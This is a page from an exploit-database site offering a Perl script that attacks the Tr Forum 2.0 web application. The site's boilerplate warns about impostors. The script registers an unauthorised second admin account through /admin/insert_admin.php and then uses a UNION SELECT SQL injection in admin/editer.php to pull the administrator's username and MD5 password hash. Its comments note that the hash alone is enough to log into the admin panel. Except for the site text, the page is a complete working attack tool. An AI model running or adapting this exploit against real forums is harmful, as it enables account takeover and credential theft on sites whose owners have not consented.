0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit
================================================================ Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit ================================================================ #!/usr/bin/perl # # Affected.scr..: Tr Forum V2.0 # Poc.ID........: 10060903 # Type..........: SQL Injection, Bypass Security Restriction # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.tr-forum.1579.html # Poc.link......: acid-root.new.fr/poc/10060903.txt # Credits.......: DarkFig # # /membres/modif_profil.php => Profil modification (you can choose the id of the member) # /membres/change_mdp.php => Password modification ( same... ) # /admin/insert_admin.php => Second admin (only del post) # /admin/editer.php => SQL Injection without quote # # You don't need to crack passwd hashes (for the admin panel)... # Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =( # This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999 # use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; print STDOUT "\n+", '-' x 53, "+\n"; print STDOUT "| Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure |\n"; print STDOUT '+', '-' x 53, "+\n"; my($host,$path,$proxh,$proxu,$proxp); my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp); if(!$host) { print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |\n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n"; print STDOUT '+', '-' x 53, "+\n"; exit(0); } if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} if(!$path) {$path = '/';} print STDOUT " [!]Host..: $host\n"; print STDOUT " [!]Path..: $path\n"; print STDOUT " [~]Admin user...\n"; sleep(1); my $cc = HTTP::Cookies->new(); my $ua = LWP::UserAgent->new(); $ua->cookie_jar($cc); $ua->agent('0xzilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; my $re = POST $host.$path.'/admin/insert_admin.php',[ 'login' => 'AcidSploitWasHere', 'password' => 'psychopasswd', 'mail' => 'nospam@bot.com', ]; $re->proxy_authorization_basic($proxu, $proxp) if $proxp; $ua->request($re); print STDOUT " [+]User..: AcidSploitWasHere\n"; print STDOUT " [+]Pass..: psychopasswd\n"; print STDOUT " [!]Rights: 2 (medium)\n"; print STDOUT " [~]Collecting admin's hash/username...\n"; sleep(1); my $re = POST $host.$path.'index.php',[ 'login' => 'AcidSploitWasHere', 'pwd' => 'psychopasswd', ]; $ua->request($re); my $re = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum'); if($re->content =~ /">([a-z0-9]{32})<\/font>/) { print STDOUT "\n ".$1.'::';} if($re->content =~ /;">(.*?)<\/textarea>/) { print STDOUT $1.' (root)';} print STDOUT "\n+", '-' x 53, "+\n"; exit(0); # 0day.today [2024-11-15] #